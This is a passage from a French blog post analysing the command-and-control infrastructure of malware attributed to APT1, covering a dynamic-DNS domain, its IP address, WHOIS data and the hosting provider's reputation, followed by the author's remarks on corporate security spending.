Pour ce qui est du serveur de command&control (c&c ou encore c2) utilisé par le malware, downloads.zyns.com, il s'agit à nouveau d'un DNS dynamique permettant aux attaquants de changer d'adresse IP (et donc d'hébergement) facilement sans avoir à modifier leur malware.

La dernière adresse IP utilisée est 108.177.181.66 et pointe vers l'hébergeur Nobistech situé aux Etats-Unis. Cette adresse IP appartient à un range attribué à:

network:Org-Name:31dns network:Street-Address:QuJiangLu 183 Hao network:City:JingZhou network:State:HuBei network:Postal-Code:434000 network:Country-Code:CN

Hmmm, quelle surprise... ;-)

En creusant un peu plus profondément, on se rend vite compte que Nobistech héberge du contenu légal, mais aussi beaucoup de contenu illicite : téléchargement de jeux vidéos, jailbreak de téléphone, card sharing, pharmacie, et on peut supposer qu'on peut facilement y trouver pire. Certaines plages de Nobistech sont également connues et blacklistées pour des envois massifs de spam.

J'ai pu trouver 4689 domaines qui ont pointé vers cette plage d'adresses IP spécifique (108.177.180.0/22), et la plupart de ces domaines ne présentent pas de noms particuliers, beaucoup de domaines semblent créés avec des caractères aléatoires et ne présenter aucun contenu, ou un message d'erreur, ou encore une page de parking d'hébergeur.

Tous ces éléments m'encouragent à penser encore une fois que lorsque les attaquants "Comment Crew/APT1" choisissent un tiers pour héberger du contenu, il s'agit toujours d'hébergeurs à la moralité plus ou moins douteuse, voir carrément d'hébergeurs bulletproof.

Décidément, nos attaquants ont tout pour réussir: des outils qui fonctionnent plutôt bien, des utilisateurs ciblés qui ouvrent leurs pièces jointes (on ne peut pas leur en vouloir tellement les spear phishing sont bien faits ceci dit, nous sommes loin des e-mails non crédibles de phishing bancaire), et surtout, des sociétés qui ne veulent pas se donner les moyens d'avoir une sécurité informatique qui puisse lutter plus efficacement contre les APT.

Je vous laisse sur cette réflexion et cet article de DarkReading pour illustrer mon propos :-)